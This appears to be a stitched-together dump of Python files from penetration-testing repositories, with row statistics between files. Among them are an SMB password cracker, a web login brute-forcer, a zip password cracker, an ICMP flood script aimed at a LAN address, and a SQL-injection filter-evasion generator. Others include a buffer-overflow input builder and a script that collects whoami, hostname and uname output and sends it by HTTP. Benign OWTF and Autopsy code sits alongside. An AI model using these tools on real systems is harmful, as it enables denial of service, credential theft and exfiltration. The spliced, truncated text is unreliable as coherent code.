self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['smb']):
printPink("crack smb now...")
print "[*] start crack smb serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['smb']:
pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop smb serice %s" % time.ctime()
print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'smb': ['10.211.55.3:445']}
pinglist=['101.201.177.35']
test=smb_burp(c)
test.run(ipdict,pinglist,50,file="../result/test") | 32.833333 | 125 | 0.529363 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-10
# @File : __init__.py.py
# @Desc : ""
| 16 | 27 | 0.481481 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from bluetooth import *
def rfcommCon(addr, port):
sock = BluetoothSocket(RFCOMM)
try:
sock.connect((addr, port))
print '[+] RFCOMM Port ' + str(port) + ' open'
sock.close()
except Exception, e:
print '[-] RFCOMM Port ' + str(port) + ' closed'
for port in range(1, 30):
rfcommCon('00:16:38:DE:AD:11', port)
| 20.210526 | 56 | 0.569652 |
cybersecurity-penetration-testing | from scapy.all import *
ip1 = IP(src="192.168.0.99", dst ="192.168.0.11")
packet = ip1/ICMP()/("m"*60000)
send(packet)
i=0
while i<20 :
send(packet)
i = i+1
| 15.1 | 49 | 0.61875 |
Hands-On-AWS-Penetration-Testing-with-Kali-Linux | #!/usr/bin/env python3
import boto3
import json
session = boto3.session.Session(profile_name='Test', region_name='us-west-2')
client = session.client('iam')
user_details = []
group_details = []
role_details = []
policy_details = []
response = client.get_account_authorization_details()
if response.get('UserDetailList'):
user_details.extend(response['UserDetailList'])
if response.get('GroupDetailList'):
group_details.extend(response['GroupDetailList'])
if response.get('RoleDetailList'):
role_details.extend(response['RoleDetailList'])
if response.get('Policies'):
policy_details.extend(response['Policies'])
while response['IsTruncated']:
response = client.get_account_authorization_details(Marker=response['Marker'])
if response.get('UserDetailList'):
user_details.extend(response['UserDetailList'])
if response.get('GroupDetailList'):
group_details.extend(response['GroupDetailList'])
if response.get('RoleDetailList'):
role_details.extend(response['RoleDetailList'])
if response.get('Policies'):
policy_details.extend(response['Policies'])
with open('./users.json', 'w+') as f:
json.dump(user_details, f, indent=4, default=str)
with open('./groups.json', 'w+') as f:
json.dump(group_details, f, indent=4, default=str)
with open('./roles.json', 'w+') as f:
json.dump(role_details, f, indent=4, default=str)
with open('./policies.json', 'w+') as f:
json.dump(policy_details, f, indent=4, default=str)
username = client.get_user()['User']['UserName']
current_user = None
for user in user_details:
if user['UserName'] == username:
current_user = user
break
my_policies = []
if current_user.get('UserPolicyList'):
for policy in current_user['UserPolicyList']:
my_policies.append(policy['PolicyDocument'])
if current_user.get('AttachedManagedPolicies'):
for managed_policy in user['AttachedManagedPolicies']:
policy_arn = managed_policy['PolicyArn']
for policy_detail in policy_details:
if policy_detail['Arn'] == policy_arn:
default_version = policy_detail['DefaultVersionId']
for version in policy_detail['PolicyVersionList']:
if version['VersionId'] == default_version:
my_policies.append(version['Document'])
break
break
if current_user.get('GroupList'):
for user_group in current_user['GroupList']:
for group in group_details:
if group['GroupName'] == user_group:
if group.get('GroupPolicyList'):
for inline_policy in group['GroupPolicyList']:
my_policies.append(inline_policy['PolicyDocument'])
if group.get('AttachedManagedPolicies'):
for managed_policy in group['AttachedManagedPolicies']:
policy_arn = managed_policy['PolicyArn']
for policy in policy_details:
if policy['Arn'] == policy_arn:
default_version = policy['DefaultVersionId']
for version in policy['PolicyVersionList']:
if version['VersionId'] == default_version:
my_policies.append(version['Document'])
break
break
with open('./my-user-permissions.json', 'w+') as f:
json.dump(my_policies, f, indent=4, default=str) | 32.59375 | 82 | 0.674628 |
owtf | """
PASSIVE Plugin for Testing for Error Code (OWASP-IG-006)
https://www.owasp.org/index.php/Testing_for_Error_Code_%28OWASP-IG-006%29
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Google Hacking for Error codes"
def run(PluginInfo):
resource = get_resources("PassiveErrorMessagesLnk")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 29.4 | 75 | 0.767033 |
Effective-Python-Penetration-Testing | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
class TestspiderPipeline(object):
def process_item(self, item, spider):
return item
| 23.25 | 65 | 0.706897 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
owtf | """
owtf.managers.worker
~~~~~~~~~~~~~~~~~~~~
Manage workers and assign work to them.
"""
import logging
import multiprocessing
import signal
from time import strftime
try:
import queue
except ImportError:
import Queue as queue
import psutil
from owtf.db.session import get_scoped_session
from owtf.lib.exceptions import InvalidWorkerReference
from owtf.managers.worklist import get_work_for_target
from owtf.workers.local import LocalWorker
from owtf.settings import MIN_RAM_NEEDED, PROCESS_PER_CORE
from owtf.utils.error import abort_framework
from owtf.utils.process import check_pid, _signal_process
from owtf.utils.signals import workers_finish, owtf_start
__all__ = ["worker_manager"]
# For psutil
TIMEOUT = 3
class WorkerManager(object):
def __init__(self):
# Complicated stuff to keep everything Pythonic and from blowing up
def handle_signal(sender, **kwargs):
self.on_start(sender, **kwargs)
self.handle_signal = handle_signal
owtf_start.connect(handle_signal)
self.worklist = [] # List of unprocessed (plugin*target)
self.workers = [] # list of worker and work (worker, work)
self.session = get_scoped_session()
self.spawn_workers()
def on_start(self, sender, **kwargs):
self.keep_working = not kwargs["args"]["nowebui"]
def get_allowed_process_count(self):
"""Get the number of max processes
:return: max number of allowed processes
:rtype: `int`
"""
cpu_count = multiprocessing.cpu_count()
return PROCESS_PER_CORE * cpu_count
def get_task(self):
"""Fetch task dict for worker
:return: Work dict
:rtype: `dict`
"""
work = None
avail = psutil.virtual_memory().available
if int(avail / 1024 / 1024) > MIN_RAM_NEEDED:
work = get_work_for_target(self.session, self.targets_in_use())
else:
logging.warn("Not enough memory to execute a plugin")
return work
def spawn_workers(self):
"""This function spawns the worker process and give them initial work
:return: None
:rtype: None
"""
# Check if maximum limit of processes has reached
while len(self.workers) < self.get_allowed_process_count():
self.spawn_worker()
if not len(self.workers):
abort_framework("Zero worker processes created because of lack of memory")
def spawn_worker(self, index=None):
"""Spawn a new worker
:param index: Worker index
:type index: `int`
:return: None
:rtype: None
"""
w = LocalWorker(
input_q=multiprocessing.Queue(),
output_q=multiprocessing.Queue(),
index=index,
)
worker_dict = {"worker": w, "work": (), "busy": False, "paused": False}
if index is not None:
logging.debug("Replacing worker at index %d", index)
self.workers[index] = worker_dict
else:
logging.debug("Adding a new worker")
self.workers.append(worker_dict)
w.start()
def targets_in_use(self):
target_ids = []
for item in self.workers:
try:
target_ids.append(item["work"][0]["id"])
except IndexError:
continue
return target_ids
def manage_workers(self):
"""This function manages workers, it polls on each queue of worker
checks if it has done his work and then gives it new work
if there is one
:return: None
:rtype: None
"""
# Loop while there is some work in worklist
for k in range(0, len(self.workers)):
if (
not self.workers[k]["worker"].output_q.empty()
or not check_pid(self.workers[k]["worker"].pid)
):
if check_pid(self.workers[k]["worker"].pid):
# Assign target, plugin from tuple work and empty the tuple
self.workers[k]["work"] = ()
self.workers[k]["busy"] = False # Worker is IDLE
self.workers[k]["start_time"] = "NA"
else:
logging.info(
"Worker with name %s and pid %d seems dead",
self.workers[k]["worker"].name,
self.workers[k]["worker"].pid,
)
self.spawn_worker(index=k)
work_to_assign = self.get_task()
if work_to_assign:
logging.info(
"Work assigned to %s with pid %d",
self.workers[k]["worker"].name,
self.workers[k]["worker"].pid,
)
trash_can = self.workers[k]["worker"].output_q.get()
# Assign work ,set target to used,and process to busy
self.workers[k]["worker"].input_q.put(work_to_assign)
self.workers[k]["work"] = work_to_assign
self.workers[k]["busy"] = True
self.workers[k]["start_time"] = strftime("%Y/%m/%d %H:%M:%S")
if not self.keep_working:
if not self.is_any_worker_busy():
logging.info("All jobs have been done. Exiting.")
workers_finish.send(self)
def is_any_worker_busy(self):
"""If a worker is still busy, return True. Return False otherwise.
:return: True if any worker is busy
:return: `bool`
"""
return True in [worker["busy"] for worker in self.workers]
def poison_pill_to_workers(self):
"""This function waits for each worker to complete his work and
send it poison pill (empty work)
:return: None
:rtype: None
"""
for item in self.workers:
# Check if process is doing some work
if item["busy"]:
if item["paused"]:
_signal_process(item["worker"].pid, signal.SIGCONT)
trash = item["worker"].output_q.get()
item["busy"] = False
item["work"] = ()
item["worker"].poison_q.put("DIE")
def join_workers(self):
"""Joins all the workers
:return: None
:rtype: None
"""
for item in self.workers:
item["worker"].join()
def clean_up(self):
"""Cleanup workers
:return: None
:rtype: None
"""
self.poison_pill_to_workers()
self.join_workers()
def exit(self):
"""This function empties the pending work list and aborts all processes
:return: None
:rtype: None
"""
# As worklist is emptied, aborting of plugins will result in
# killing of workers
self.worklist = [] # It is a list
for item in self.workers:
work = item["worker"].poison_q.put("DIE")
_signal_process(item["worker"].pid, signal.SIGINT)
@staticmethod
def _signal_children(parent_pid, psignal):
"""Signal OWTF child processes
:param parent_pid: Parent process PID
:type parent_pid: `int`
:param psignal: Signal to send
:type parent_pid: `int`
:return: None
:rtype: None
"""
def on_terminate(proc):
logging.debug(
"Process %s terminated with exit code %d", proc, proc.returncode
)
parent = psutil.Process(parent_pid)
children = parent.children(recursive=True)
for child in children:
child.send_signal(psignal)
gone, alive = psutil.wait_procs(
children, timeout=TIMEOUT, callback=on_terminate
)
if not alive:
# send SIGKILL
for pid in alive:
logging.debug("Process %d survived SIGTERM; trying SIGKILL", pid)
pid.kill()
gone, alive = psutil.wait_procs(alive, timeout=TIMEOUT, callback=on_terminate)
if not alive:
# give up
for pid in alive:
logging.debug("Process %d survived SIGKILL; giving up", pid)
# NOTE: PSEUDO_INDEX = INDEX + 1
# This is because the list index starts from 0 and in the UI, indices start from 1
def get_worker_details(self, pseudo_index=None):
"""Get worker details
:param pseudo_index: worker index
:type pseudo_index: `int`
:return: Worker details
:rtype: `dict`
"""
if pseudo_index:
try:
temp_dict = dict(self.workers[pseudo_index - 1])
temp_dict["name"] = temp_dict["worker"].name
temp_dict["worker"] = temp_dict["worker"].pid
temp_dict["id"] = pseudo_index
return temp_dict
except IndexError:
raise InvalidWorkerReference(
"No worker process with id: {!s}".format(pseudo_index)
)
else:
worker_temp_list = []
for i, obj in enumerate(self.workers):
temp_dict = dict(self.workers[i])
temp_dict["name"] = temp_dict["worker"].name
temp_dict["worker"] = temp_dict["worker"].pid
temp_dict["id"] = i + 1 # Zero-Index is not human friendly
worker_temp_list.append(temp_dict)
return worker_temp_list
def get_busy_workers(self):
"""Returns number of busy workers
:return: Number of busy workers
:rtype: `int`
"""
count = 0
workers = self.get_worker_details()
for worker in workers:
if worker["busy"] is True:
count += 1
return count
def get_worker_dict(self, pseudo_index):
"""Fetch the worker dict from the list
:param pseudo_index: worker index
:type pseudo_index: `int`
:return: Worker info
:rtype: `dict`
"""
try:
return self.workers[pseudo_index - 1]
except IndexError:
raise InvalidWorkerReference(
"No worker process with id: {!s}".format(pseudo_index)
)
def create_worker(self):
"""Create new worker
:return: None
:rtype: None
"""
self.spawn_worker()
def delete_worker(self, pseudo_index):
"""
This actually deletes the worker :
+ Send SIGINT to the worker
+ Remove it from self.workers so that is is not restarted by
manager cron
"""
worker_dict = self.get_worker_dict(pseudo_index)
if not worker_dict["busy"]:
_signal_process(worker_dict["worker"].pid, signal.SIGINT)
del self.workers[pseudo_index - 1]
else:
raise InvalidWorkerReference(
"Worker with id {!s} is busy".format(pseudo_index)
)
def pause_worker(self, pseudo_index):
"""Pause worker by sending SIGSTOP after verifying the process is running
:param pseudo_index: worker index
:type pseudo_index: `int`
:return: None
:rtype: None
"""
worker_dict = self.get_worker_dict(pseudo_index)
if not worker_dict["paused"]:
self._signal_children(worker_dict["worker"].pid, signal.SIGSTOP)
_signal_process(worker_dict["worker"].pid, signal.SIGSTOP)
worker_dict["paused"] = True
def pause_all_workers(self):
"""Pause all workers by sending SIGSTOP after verifying they are running
:return: None
:rtype: None
"""
for worker_dict in self.workers:
if not worker_dict["paused"]:
self._signal_children(worker_dict["worker"].pid, signal.SIGSTOP)
_signal_process(worker_dict["worker"].pid, signal.SIGSTOP)
worker_dict["paused"] = True
def resume_worker(self, pseudo_index):
"""Resume worker by sending SIGCONT after verifying that process is paused
:param pseudo_index: Worker index
:type pseudo_index: `int`
:return: None
:rtype: None
"""
worker_dict = self.get_worker_dict(pseudo_index)
if worker_dict["paused"]:
self._signal_children(worker_dict["worker"].pid, signal.SIGCONT)
_signal_process(worker_dict["worker"].pid, signal.SIGCONT)
worker_dict["paused"] = False
def resume_all_workers(self):
"""Resume all workers by sending SIGCONT to each one of them after verification
that it is really paused
:return: None
:rtype: None
"""
for worker_dict in self.workers:
if worker_dict["paused"]:
self._signal_children(worker_dict["worker"].pid, signal.SIGCONT)
_signal_process(worker_dict["worker"].pid, signal.SIGCONT)
worker_dict["paused"] = False
def abort_worker(self, pseudo_index):
"""Abort worker i.e kill current command, but the worker process is not
removed, so manager_cron will restart it
:param pseudo_index: pseudo index for the worker
:type pseudo_index: `int`
:return: None
:rtype: None
"""
worker_dict = self.get_worker_dict(pseudo_index)
# You only send SIGINT to worker since it will handle it more
# gracefully and kick the command process's ***
_signal_process(worker_dict["worker"].pid, signal.SIGINT)
worker_manager = WorkerManager()
| 32.769042 | 87 | 0.554537 |
cybersecurity-penetration-testing | import requests
import urllib
import subprocess
from subprocess import PIPE, STDOUT
commands = ['whoami','hostname','uname']
out = {}
for command in commands:
try:
p = subprocess.Popen(command, stderr=STDOUT, stdout=PIPE)
out[command] = p.stdout.read().strip()
except:
pass
requests.get('http://localhost:8000/index.html?' + urllib.urlencode(out))
| 22.058824 | 73 | 0.667519 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | import urllib2
from bs4 import BeautifulSoup
import sys
urls = []
urls2 = []
tarurl = sys.argv[1]
url = urllib2.urlopen(tarurl).read()
soup = BeautifulSoup(url)
for line in soup.find_all('a'):
newline = line.get('href')
print line.get('href')
try:
if newline[:4] == "http":
if tarurl in newline:
urls.append(str(newline))
elif newline[:1] == "/":
combline = tarurl+newline
urls.append(str(combline))
except:
pass
for uurl in urls:
url = urllib2.urlopen(uurl).read()
soup = BeautifulSoup(url)
for line in soup.find_all('a'):
newline = line.get('href')
try:
if newline[:4] == "http":
if tarurl in newline:
urls2.append(str(newline))
elif newline[:1] == "/":
combline = tarurl+newline
urls2.append(str(combline))
except:
pass
urls3 = set(urls2)
for value in urls3:
print value
| 24.675 | 42 | 0.532164 |
Python-Penetration-Testing-for-Developers | subs = []
values = {" ": "%50", "SELECT": "HAVING", "AND": "&&", "OR": "||"}
originalstring = "' UNION SELECT * FROM Users WHERE username = 'admin' OR 1=1 AND username = 'admin';#"
secondoriginalstring = originalstring
for key, value in values.iteritems():
if key in originalstring:
newstring = originalstring.replace(key, value)
subs.append(newstring)
if key in secondoriginalstring:
secondoriginalstring = secondoriginalstring.replace(key, value)
subs.append(secondoriginalstring)
subset = set(subs)
for line in subs:
print line | 35.266667 | 103 | 0.714549 |
cybersecurity-penetration-testing | #brute force passwords
import sys
import urllib
import urllib2
if len(sys.argv) !=3:
print "usage: %s userlist passwordlist" % (sys.argv[0])
sys.exit(0)
filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
url = "http://www.vulnerablesite.com/login.html"
foundusers = []
UnknownStr="Username not found"
for user in userlist:
for password in passwordlist:
data = urllib.urlencode({"username":user})
request = urllib2.urlopen(url,data)
response = request.read()
if(response.find(UnknownStr)>=0)
foundusers.append(user)
request.close()
if len(foundusers)>0:
print "Found Users:\n"
for name in foundusers:
print name+"\n"
else:
print "No users found\n"
| 22 | 60 | 0.682458 |
cybersecurity-penetration-testing | import urllib
from bs4 import BeautifulSoup
import re
domain=raw_input("Enter the domain name ")
url = "http://smartwhois.com/whois/"+str(domain)
ht= urllib.urlopen(url)
html_page = ht.read()
b_object = BeautifulSoup(html_page)
file_text= open("who.txt",'a')
who_is = b_object.body.find('div',attrs={'class' : 'whois'})
who_is1=str(who_is)
for match in re.finditer("Domain Name:",who_is1):
s= match.start()
lines_raw = who_is1[s:]
lines = lines_raw.split("<br/>",150)
i=0
for line in lines :
file_text.writelines(line)
file_text.writelines("\n")
print line
i=i+1
if i==17 :
break
file_text.writelines("-"*50)
file_text.writelines("\n")
file_text.close()
| 17.026316 | 60 | 0.671053 |
owtf | """
Plugin for probing ftp
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " FTP Probing "
def run(PluginInfo):
resource = get_resources("FtpProbeMethods")
# No previous output
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 23.428571 | 88 | 0.73607 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import zipfile
import optparse
from threading import Thread
def extractFile(zFile, password):
try:
zFile.extractall(pwd=password)
print '[+] Found password ' + password + '\n'
except:
pass
def main():
parser = optparse.OptionParser("usage %prog "+\
"-f <zipfile> -d <dictionary>")
parser.add_option('-f', dest='zname', type='string',\
help='specify zip file')
parser.add_option('-d', dest='dname', type='string',\
help='specify dictionary file')
(options, args) = parser.parse_args()
if (options.zname == None) | (options.dname == None):
print parser.usage
exit(0)
else:
zname = options.zname
dname = options.dname
zFile = zipfile.ZipFile(zname)
passFile = open(dname)
for line in passFile.readlines():
password = line.strip('\n')
t = Thread(target=extractFile, args=(zFile, password))
t.start()
if __name__ == '__main__':
main()
| 23.452381 | 62 | 0.590643 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
buffer = ''
buffer += 'a'*27
buffer += pack("<Q", 0x0040135f)
f = open("input.txt", "w")
f.write(buffer)
| 17.125 | 32 | 0.625 |
Python-Penetration-Testing-for-Developers | import socket
host = "192.168.0.1"
port = 12346
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.bind((host,port))
s.settimeout(5)
data, addr = s.recvfrom(1024)
print "recevied from ",addr
print "obtained ", data
s.close()
except socket.timeout :
print "Client not connected"
s.close() | 18.3125 | 52 | 0.694805 |
cybersecurity-penetration-testing | #
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
# See http://sleuthkit.org/autopsy/docs/api-docs/3.1/index.html for documentation
# Simple report module for Autopsy.
# Used as part of Python tutorials from Basis Technology - September 2015
import os
import logging
import jarray
from array import *
from java.lang import System
from java.util.logging import Level
from org.sleuthkit.datamodel import TskData
from org.sleuthkit.datamodel import AbstractFile
from org.sleuthkit.datamodel import ReadContentInputStream
from org.sleuthkit.autopsy.casemodule import Case
from org.sleuthkit.autopsy.coreutils import Logger
from org.sleuthkit.autopsy.report import GeneralReportModuleAdapter
from org.sleuthkit.autopsy.report.ReportProgressPanel import ReportStatus
from org.sleuthkit.autopsy.casemodule.services import FileManager
# List of English Language stop words. These words may be
# capitalized in text documents, but provide little probative
# value, therefore they will be ignored if detected during the
# search. Stop words exist in virtually every language and
# many versions of stop words exist. I have put this list together
# over time and found it to be effective in eliminating
# words that are not of interest.
stopWords =["able","about","above","accordance","according",
"accordingly","across","actually","added","affected",
"affecting","affects","after","afterwards","again",
"against","almost","alone","along","already","also",
"although","always","among","amongst","announce",
"another","anybody","anyhow","anymore","anyone",
"anything","anyway","anyways","anywhere","apparently",
"approximately","arent","arise","around","aside",
"asking","auth","available","away","awfully","back",
"became","because","become","becomes","becoming",
"been","before","beforehand","begin","beginning",
"beginnings","begins","behind","being",
"believe","below","beside","besides","between",
"beyond","both","brief","briefly","came","cannot",
"cause","causes","certain","certainly","come",
"comes","contain","containing","contains","could",
"couldnt","date","different","does","doing","done",
"down","downwards","during","each","effect","eight",
"eighty","either","else","elsewhere","end",
"ending","enough","especially","even","ever",
"every","everybody","everyone","everything",
"everywhere","except","fifth","first","five",
"followed","following","follows","former","formerly",
"forth","found","four","from","further",
"furthermore","gave","gets","getting",
"give","given","gives","giving","goes",
"gone","gotten","happens","hardly","has","have",
"having","hence","here","hereafter","hereby",
"herein","heres","hereupon","hers","herself",
"himself","hither","home","howbeit","however",
"hundred","immediate","immediately","importance",
"important","indeed","index","information",
"instead","into","invention","inward","itself",
"just","keep","keeps","kept","know","known",
"knows","largely","last","lately","later","latter",
"latterly","least","less","lest","lets","like",
"liked","likely","line","little","look","looking",
"looks","made","mainly","make","makes","many",
"maybe","mean","means","meantime","meanwhile",
"merely","might","million","miss","more","moreover",
"most","mostly","much","must","myself","name",
"namely","near","nearly","necessarily","necessary",
"need","needs","neither","never","nevertheless",
"next","nine","ninety","nobody","none","nonetheless",
"noone","normally","noted","nothing","nowhere",
"obtain","obtained","obviously","often","okay",
"omitted","once","ones","only","onto","other",
"others","otherwise","ought","ours","ourselves",
"outside","over","overall","owing","page","pages",
"part","particular","particularly","past","perhaps",
"placed","please","plus","poorly","possible","possibly",
"potentially","predominantly","present","previously",
"primarily","probably","promptly","proud","provides",
"quickly","quite","rather","readily","really","recent",
"recently","refs","regarding","regardless",
"regards","related","relatively","research",
"respectively","resulted","resulting","results","right",
"run","said","same","saying","says","section","see",
"seeing","seem","seemed","seeming","seems","seen",
"self","selves","sent","seven","several","shall",
"shed","shes","should","show","showed","shown",
"showns","shows","significant","significantly",
"similar","similarly","since","slightly","some",
"somebody","somehow","someone","somethan",
"something","sometime","sometimes","somewhat",
"somewhere","soon","sorry","specifically","specified",
"specify","specifying","still","stop","strongly",
"substantially","successfully","such","sufficiently",
"suggest","sure","take","taken","taking","tell",
"tends","than","thank","thanks","thanx","that",
"thats","their","theirs","them","themselves","then",
"thence","there","thereafter","thereby","thered",
"therefore","therein","thereof","therere",
"theres","thereto","thereupon","there've","these",
"they","think","this","those","thou","though","thought",
"thousand","through","throughout","thru","thus",
"together","took","toward","towards","tried","tries",
"truly","trying","twice","under","unfortunately",
"unless","unlike","unlikely","until","unto","upon",
"used","useful","usefully","usefulness","uses","using",
"usually","value","various","very","want","wants",
"was","wasnt","welcome","went","were","what","whatever",
"when","whence","whenever","where","whereafter","whereas",
"whereby","wherein","wheres","whereupon","wherever",
"whether","which","while","whim","whither","whod",
"whoever","whole","whom","whomever","whos","whose",
"widely","willing","wish","with","within","without",
"wont","words","world","would","wouldnt",
"your","youre","yours","yourself","yourselves"]
####################
# Function
# Name: ExtractProperNames
# Purpose: Extract possible proper names from the passed string
# Input: string
# Return: Dictionary of possible Proper Names along with the number of
# of occurrences as a key, value pair
# Usage: theDictionary = ExtractProperNames('John is from Alaska')
####################
def ExtractProperNames(theBuffer):
# Prepare the string (strip formatting and special characters)
# You can extend the set of allowed characters by adding to the string
# Note 1: this example assumes ASCII characters not unicode
# Note 2: You can expand the allowed ASCII characters that you
# choose to include for valid proper name searches
# by modifying this string. For this example I have kept
# the list simple.
allowedCharacters ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
finalString = ''
# Notice that you can write Python like English if you choose your
# words carefully
# Process each character in the theString passed to the function
for eachCharacter in theBuffer:
# Check to see if the character is in the allowedCharacter string
if eachCharacter in allowedCharacters:
# Yes, then add the character to the finalString
finalString = finalString + eachCharacter
else:
# otherwise replace the not allowed character
# with a space
finalString = finalString + ' '
# Now that we only have allowed characters or spaces in finalString
# we can use the built in Python string.split() method
# This one line will create a list of words contained in the finalString
wordList = finalString.split()
# Now, let's determine which words are possible proper names
# and create a list of them.
# We start by declaring an empty list
properNameList = []
# For this example we will assume words are possible proper names
# if they are in title case and they meet certain length requirements
# We will use a Min Length of 4 and a Max Length of 20
# To do this, we loop through each word in the word list
# and if the word is in title case and the word meets
# our minimum/maximum size limits we add the word to the properNameList
# We utilize the Python built in string method string.istitle()
#
# Note: I'm setting minimum and maximum word lengths that
# will be considered proper names. You can adjust these
# psuedo constants for your situation. Note if you make
# the MIN_SIZE smaller you should also update the StopWord
# list to include smaller stop words.
MIN_SIZE = 4
MAX_SIZE = 20
for eachWord in wordList:
if eachWord.istitle() and len(eachWord) >= MIN_SIZE and len(eachWord) <= MAX_SIZE:
# if the word meets the specified conditions we add it
# and it is not a common stop word
# we add it to the properNameList
if eachWord.lower() not in stopWords:
properNameList.append(eachWord)
else:
# otherwise we loop to the next word
continue
# Note this list will likely contain duplicates to deal with this
# and to determine the number of times a proper name is used
# we will create a Python Dictionary
# The Dictionary will contain a key, value pair.
# The key will be the proper name and value is the number of occurrences
# found in the text
# Create an empty dictionary
properNamesDictionary = {}
# Next we loop through the properNamesList
for eachName in properNameList:
# if the name is already in the dictionary
# the name has been processed increment the number
# of occurrences, otherwise add a new entry setting
# the occurrences to 1
if eachName in properNamesDictionary:
cnt = properNamesDictionary[eachName]
properNamesDictionary[eachName] = cnt+1
else:
properNamesDictionary[eachName] = 1
# Once all the words have been processed
# the function returns the created properNamesDictionary
return properNamesDictionary
# End Extract Proper Names Function
# Class responsible for defining module metadata and logic
class CSVReportModule(GeneralReportModuleAdapter):
# This defines the Report name
moduleName = "Proper Names Report"
_logger = None
def log(self, level, msg):
if _logger == None:
_logger = Logger.getLogger(self.moduleName)
self._logger.logp(level, self.__class__.__name__, inspect.stack()[1][3], msg)
def getName(self):
return self.moduleName
def getDescription(self):
return "Extracts Possible Proper Names"
def getRelativeFilePath(self):
return "prop.txt"
# The 'baseReportDir' object being passed in is a string
# with the directory that reports are being stored in.
# Report should go into baseReportDir + getRelativeFilePath().
# The 'progressBar' object is of type ReportProgressPanel.
# See: http://sleuthkit.org/autopsy/docs/api-docs/3.1/classorg_1_1sleuthkit_1_1autopsy_1_1report_1_1_report_progress_panel.html
def generateReport(self, baseReportDir, progressBar):
# Open the output file.
fileName = os.path.join(baseReportDir, self.getRelativeFilePath())
report = open(fileName, 'w')
# Query the database for the files (ignore the directories)
sleuthkitCase = Case.getCurrentCase().getSleuthkitCase()
files = sleuthkitCase.findAllFilesWhere("NOT meta_type = " + str(TskData.TSK_FS_META_TYPE_ENUM.TSK_FS_META_TYPE_DIR.getValue()))
# Setup progress Indicator
progressBar.setIndeterminate(False)
progressBar.start()
progressBar.setMaximumProgress(len(files))
for file in files:
# For this script I will limit the processing
# to files with .txt extensions only
if file.getName().lower().endswith(".txt"):
# Setup to Read the contents of the file.
# Create a Python string to hold the file contents
# for processing
fileStringBuffer = ''
# Setup an inputStream to read the file
inputStream = ReadContentInputStream(file)
# Setup a jarry buffer to read chunks of the file
# we will read 1024 byte chunks
buffer = jarray.zeros(1024, "b")
# Attempt to read in the first Chunk
bytesRead = inputStream.read(buffer)
# Continue reading until finished reading
# the file indicated by -1 return from
# the inputStream.read() method
while (bytesRead != -1):
for eachItem in buffer:
# Now extract only potential ascii characters from the
# buffer and build the final Python string
# that we will process.
if eachItem >= 0 and eachItem <= 255:
fileStringBuffer = fileStringBuffer + chr(eachItem)
# Read the next file Chunk
bytesRead = inputStream.read(buffer)
# Once the complete file has been read and the
# possible ASCII characters have been extracted
# The ExtractProperNames Function
# will process the contents of the file
# the result will be returned as a Python
# dictionary object
properNamesDictionary = ExtractProperNames(fileStringBuffer)
# For each file processed
# Write the information to the Report
# File Name, along with each possible proper name
# found, with highest occurring words order
report.write("\n\nProcessing File: "+ file.getUniquePath() + "\n\n")
report.write("Possible Name Occurrences \n")
report.write("-------------------------------- \n")
for eachName in sorted(properNamesDictionary, key=properNamesDictionary.get, reverse=True):
theName = '{:20}'.format(eachName)
theCnt = '{:5d}'.format(properNamesDictionary[eachName])
report.write(theName + theCnt + "\n")
# Increment the progress bar for each
# file processed
progressBar.increment()
# Process the Next File
# Close the report and post ProgressBar Complete
progressBar.complete(ReportStatus.COMPLETE)
report.close()
# Add the report to the Case
Case.getCurrentCase().addReport(fileName, self.moduleName, "Prop Report")
| 45.668421 | 137 | 0.590255 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
def pktPrint(pkt):
